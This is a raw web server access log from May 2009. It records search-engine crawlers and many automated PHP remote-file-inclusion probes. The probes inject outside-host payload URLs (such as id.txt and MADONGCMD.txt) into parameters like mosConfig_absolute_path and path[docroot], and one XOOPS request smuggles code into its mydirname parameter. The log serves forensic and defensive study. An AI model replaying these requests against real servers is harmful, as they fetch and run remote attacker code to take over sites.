78.136.7.247 - - [13/May/2009:02:34:31 -0500] "GET //includes/ktedit/toolbar.php.banned/includes/ktedit/toolbar.php?dirDepth=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:02:36:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 189195 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:02:36:13 -0500] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
217.160.4.250 - - [13/May/2009:02:37:15 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:02:37:16 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
93.187.232.189 - - [13/May/2009:02:37:44 -0500] "GET /logs//include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:37:44 -0500] "GET //include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:37:47 -0500] "GET /logs//errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:37:47 -0500] "GET //errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:38:15 -0500] "GET /logs//errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:38:15 -0500] "GET //errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:38:47 -0500] "GET /logs//include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:02:38:47 -0500] "GET //include/write.php?dir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
217.160.4.250 - - [13/May/2009:02:38:49 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:02:38:49 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:02:38:56 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:02:38:56 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:02:39:47 -0500] "GET /logs/access_log.1167177600 HTTP/1.1" 200 2170 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.136.7.247 - - [13/May/2009:02:39:57 -0500] "GET /logs//includes/ktedit/toolbar.php.banned/includes/ktedit/toolbar.php?dirDepth=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
78.136.7.247 - - [13/May/2009:02:39:57 -0500] "GET //includes/ktedit/toolbar.php.banned/includes/ktedit/toolbar.php?dirDepth=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
78.136.7.247 - - [13/May/2009:02:40:27 -0500] "GET /logs//admin.php?include_path=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
78.136.7.247 - - [13/May/2009:02:40:28 -0500] "GET //admin.php?include_path=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
217.160.4.250 - - [13/May/2009:02:41:24 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
217.160.4.250 - - [13/May/2009:02:41:24 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
124.0.73.2 - - [13/May/2009:02:42:40 -0500] "GET /logs/access_log.1232409600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:02:45:07 -0500] "GET /logs/access_log.1178150400 HTTP/1.1" 200 1083 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:02:50:22 -0500] "GET /logs/access_log.1205798400 HTTP/1.1" 200 2322 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.54.200 - - [13/May/2009:02:50:55 -0500] "GET /logs/scanhttp://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 337 "-""libwww-perl/5.813"
94.23.54.200 - - [13/May/2009:02:50:56 -0500] "GET /scanhttp://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 332 "-""libwww-perl/5.813"
94.23.54.200 - - [13/May/2009:02:52:20 -0500] "GET /logs/scanhttp://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 337 "-""libwww-perl/5.813"
94.23.54.200 - - [13/May/2009:02:52:21 -0500] "GET /scanhttp://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 332 "-""libwww-perl/5.813"
65.55.208.140 - - [13/May/2009:02:54:12 -0500] "GET /logs/access_log.1137715200 HTTP/1.1" 200 461 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [13/May/2009:02:54:12 -0500] "GET /logs/access_log.1163980800 HTTP/1.1" 200 1130 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [13/May/2009:02:54:12 -0500] "GET /logs/access_log.1148342400 HTTP/1.1" 200 2638 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [13/May/2009:02:54:13 -0500] "GET /logs/access_log.1160697600 HTTP/1.1" 200 655 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [13/May/2009:02:54:14 -0500] "GET /logs/access_log.1224201600 HTTP/1.1" 200 4340 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [13/May/2009:02:54:15 -0500] "GET /logs/access_log.1210982400 HTTP/1.1" 200 2937 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.84.128.40 - - [13/May/2009:02:55:04 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:02:55:05 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
65.55.208.130 - - [13/May/2009:02:55:31 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [13/May/2009:02:55:31 -0500] "GET /logs/access_log.1166313600 HTTP/1.1" 200 1012 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [13/May/2009:02:55:31 -0500] "GET /logs/access_log.1229040000 HTTP/1.1" 200 26529 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:02:55:39 -0500] "GET /logs/access_log.1153180800 HTTP/1.1" 200 664 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:03:00:56 -0500] "GET /logs/access_log.1195257600 HTTP/1.1" 200 5525 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.54.200 - - [13/May/2009:03:04:57 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 320 "-""libwww-perl/5.813"
94.23.54.200 - - [13/May/2009:03:04:58 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 315 "-""libwww-perl/5.813"
66.249.67.180 - - [13/May/2009:03:06:16 -0500] "GET /logs/access_log.1142726400 HTTP/1.1" 200 963 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:03:10:25 -0500] "GET /logs/access_log.1166486400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:03:11:31 -0500] "GET /logs/access_log.1160784000 HTTP/1.1" 200 2839 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.84.128.40 - - [13/May/2009:03:16:28 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:16:29 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:03:16:48 -0500] "GET /logs/access_log.1114992000 HTTP/1.1" 200 2020 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.116.178.20 - - [13/May/2009:03:19:11 -0500] "GET //errors.php?error=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:03:19:11 -0500] "GET /logs//errors.php?error=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:03:19:11 -0500] "GET /logs/access_log.1228176000//errors.php?error=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:03:19:11 -0500] "GET /logs/access_log.1226188800//errors.php?error=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:19:38 -0500] "GET //include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:19:38 -0500] "GET /logs//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:19:38 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:19:42 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.84.128.40 - - [13/May/2009:03:20:22 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:20:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
190.144.44.36 - - [13/May/2009:03:20:47 -0500] "GET //include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:20:47 -0500] "GET /logs//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:20:47 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
190.144.44.36 - - [13/May/2009:03:20:57 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:03:22:08 -0500] "GET /logs/access_log.1188518400 HTTP/1.1" 200 1157 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.142 - - [13/May/2009:03:22:45 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [13/May/2009:03:22:46 -0500] "GET /logs/access_log.1235606400 HTTP/1.1" 200 131789 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.84.128.40 - - [13/May/2009:03:25:08 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:25:08 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
200.69.47.102 - - [13/May/2009:03:26:15 -0500] "GET /index2.php?content=http://65.213.253.13/.sys/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.69.47.102 - - [13/May/2009:03:26:15 -0500] "GET /logs/index2.php?content=http://65.213.253.13/.sys/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
122.116.178.20 - - [13/May/2009:03:26:21 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:03:26:21 -0500] "GET /logs/access_log.1225843200//errors.php?error=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.66.209 - - [13/May/2009:03:27:24 -0500] "GET /logs/access_log.1183075200 HTTP/1.1" 200 3919 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.111 - - [13/May/2009:03:29:25 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:03:32:40 -0500] "GET /logs/access_log.1184025600 HTTP/1.1" 200 1711 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.235.158.157 - - [13/May/2009:03:35:11 -0500] "GET /logs/db.php?path_local=http://aclobolivia.org/archivos%20nuevos/.../idmio.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.235.158.157 - - [13/May/2009:03:35:11 -0500] "GET /db.php?path_local=http://aclobolivia.org/archivos%20nuevos/.../idmio.txt?%0D?? HTTP/1.1" 404 289 "-""libwww-perl/5.805"
88.84.128.40 - - [13/May/2009:03:36:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:36:57 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:03:38:00 -0500] "GET /logs/access_log.1194566400 HTTP/1.1" 200 4785 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.84.128.40 - - [13/May/2009:03:40:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:40:40 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:03:43:16 -0500] "GET /logs/access_log.1200873600 HTTP/1.1" 200 1362 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.55.156.2 - - [13/May/2009:03:45:32 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:03:45:32 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.820"
69.94.30.156 - - [13/May/2009:03:45:35 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:03:45:35 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
88.84.128.40 - - [13/May/2009:03:46:09 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:46:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
200.69.47.102 - - [13/May/2009:03:46:52 -0500] "GET /index.php?visualizar=http://65.213.253.13/.sys/v6id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
200.69.47.102 - - [13/May/2009:03:46:52 -0500] "GET /logs/index.php?visualizar=http://65.213.253.13/.sys/v6id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:03:46:54 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:03:46:54 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:03:48:32 -0500] "GET /logs/access_log.1147737600 HTTP/1.1" 200 2803 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.234.41.5 - - [13/May/2009:03:49:55 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:03:49:55 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
69.237.82.158 - - [13/May/2009:03:50:44 -0500] "GET /logs/errors.php?error=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:03:50:47 -0500] "GET /errors.php?error=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
88.84.128.40 - - [13/May/2009:03:51:01 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:03:51:01 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
59.109.75.82 - - [13/May/2009:03:53:04 -0500] "GET /logs/missing.html?_SERVER[DOCUMENT_ROOT]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 288 "-""Mozilla/5.0"
59.109.75.82 - - [13/May/2009:03:53:04 -0500] "GET /logs/access_log.1233619200/missing.html?_SERVER[DOCUMENT_ROOT]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 310 "-""Mozilla/5.0"
59.109.75.82 - - [13/May/2009:03:53:04 -0500] "GET /missing.html?_SERVER[DOCUMENT_ROOT]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 283 "-""Mozilla/5.0"
207.57.79.26 - - [13/May/2009:03:53:14 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:53:14 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
66.249.67.180 - - [13/May/2009:03:53:50 -0500] "GET /logs/access_log.1190419200 HTTP/1.1" 200 3055 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.178.197.14 - - [13/May/2009:03:54:10 -0500] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
207.57.79.26 - - [13/May/2009:03:54:31 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:54:31 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:54:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:54:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:55:38 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:55:38 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
66.249.67.180 - - [13/May/2009:03:55:50 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.57.79.26 - - [13/May/2009:03:56:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:56:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:56:42 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:56:42 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:56:46 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:56:47 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:57:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
